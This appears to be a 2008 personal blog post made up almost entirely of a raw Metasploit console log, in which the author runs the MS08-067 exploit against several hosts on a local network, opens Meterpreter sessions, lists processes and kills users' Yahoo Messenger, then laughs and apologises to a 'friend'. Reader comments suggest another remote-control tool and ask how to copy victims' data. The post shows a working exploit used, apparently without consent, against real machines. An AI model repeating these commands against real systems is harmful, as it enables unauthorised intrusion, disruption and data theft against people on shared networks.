Wednesday, December 03, 2008

Universal Windows Exploit, Continued

[*] Meterpreter session 11 closed.
msf exploit(ms08_067_netapi) > set RHOST 10.11.21.186
RHOST => 10.11.21.186
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 12 opened (10.11.21.200:19393 -> 10.11.21.186:4444)

meterpreter > ps x

Process list
============

PID Name Path
--- ---- ----
256 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
492 i2050.exe C:\Program Files\Nortel\IP Softphone 2050\i2050.exe
504 avgamsvr.exe C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
548 avgupsvc.exe C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
580 avgemc.exe C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
636 i2050QosSvc.exe C:\Program Files\Nortel\IP Softphone 2050\i2050QosSvc.exe
700 smss.exe \SystemRoot\System32\smss.exe
736 MDM.EXE C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
748 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
776 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
820 services.exe C:\WINDOWS\system32\services.exe
832 lsass.exe C:\WINDOWS\system32\lsass.exe
1004 DF5Serv.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
1036 Ati2evxx.exe C:\WINDOWS\system32\Ati2evxx.exe
1052 svchost.exe C:\WINDOWS\system32\svchost.exe
1132 svchost.exe C:\WINDOWS\system32\svchost.exe
1228 svchost.exe C:\WINDOWS\System32\svchost.exe
1252 StarWindService.exe C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
1356 svchost.exe C:\WINDOWS\system32\svchost.exe
1404 svchost.exe C:\WINDOWS\system32\svchost.exe
1588 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1768 jucheck.exe C:\Program Files\Java\jre1.6.0_05\bin\jucheck.exe
1864 FrzState2k.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
1924 Explorer.EXE C:\WINDOWS\Explorer.EXE
2020 jusched.exe C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
2032 smax4pnp.exe C:\Program Files\Analog Devices\Core\smax4pnp.exe
2040 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
2352 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
2468 alg.exe C:\WINDOWS\System32\alg.exe
2548 notepad.exe C:\WINDOWS\system32\notepad.exe
2972 WINWORD.EXE C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
2980 YServer.exe C:\PROGRA~1\Yahoo!\MESSEN~1\YServer.exe
3024 cmd.exe C:\WINDOWS\system32\cmd.exe
3248 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
3500 NOTEPAD.EXE C:\WINDOWS\system32\NOTEPAD.EXE

meterpreter > kill 3248
Killing: 3248
meterpreter > exit

[*] Meterpreter session 12 closed.
msf exploit(ms08_067_netapi) > set RHOST 10.11.21.124
RHOST => 10.11.21.124
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 13 opened (10.11.21.200:23453 -> 10.11.21.124:4444)

meterpreter > ps -x

Process list
============

PID Name Path
--- ---- ----
204 Reader_sl.exe C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
208 smax4pnp.exe C:\Program Files\Analog Devices\Core\smax4pnp.exe
216 avgnt.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
240 SweetIM.exe C:\Program Files\SweetIM\Messenger\SweetIM.exe
248 SearchProtection.exe C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
260 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
284 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
368 sched.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
504 i2050QosSvc.exe C:\Program Files\Nortel\IP Softphone 2050\i2050QosSvc.exe
612 MDM.EXE C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
636 smss.exe \SystemRoot\System32\smss.exe
696 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
724 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
768 services.exe C:\WINDOWS\system32\services.exe
780 lsass.exe C:\WINDOWS\system32\lsass.exe
848 audevicemgr.exe C:\Program Files\Sony Ericsson\Mobile\audevicemgr.exe
948 DF5Serv.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
980 Ati2evxx.exe C:\WINDOWS\system32\Ati2evxx.exe
996 svchost.exe C:\WINDOWS\system32\svchost.exe
1048 MROUTE~2.EXE c:\PROGRA~1\INTUWA~1\Shared\MROUTE~1\MROUTE~2.EXE
1096 svchost.exe C:\WINDOWS\system32\svchost.exe
1192 svchost.exe C:\WINDOWS\System32\svchost.exe
1280 svchost.exe C:\WINDOWS\system32\svchost.exe
1324 wdfmgr.exe C:\WINDOWS\system32\wdfmgr.exe
1392 svchost.exe C:\WINDOWS\system32\svchost.exe
1424 WinVNC4.exe D:\titipan dwi\vnc\VNC4\WinVNC4.exe
1576 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1624 avguard.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
1784 CONNMN~1.EXE C:\PROGRA~1\SONYER~1\Mobile\CONNEC~1\CONNMN~1.EXE
1992 Explorer.EXE C:\WINDOWS\Explorer.EXE
2072 FrzState2k.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
2344 alg.exe C:\WINDOWS\System32\alg.exe
2608 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
2692 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

meterpreter > kill 2692
Killing: 2692

Hahahahaha, so funny ... honestly, sorry about that, my friend

2 comments:

  1. Just use DameWare NT Utilities, bro.. it's more fun.. as long as you know the network password ;)

  2. Bro, if we want to copy the data to our own computer, how do we do that?

    tq
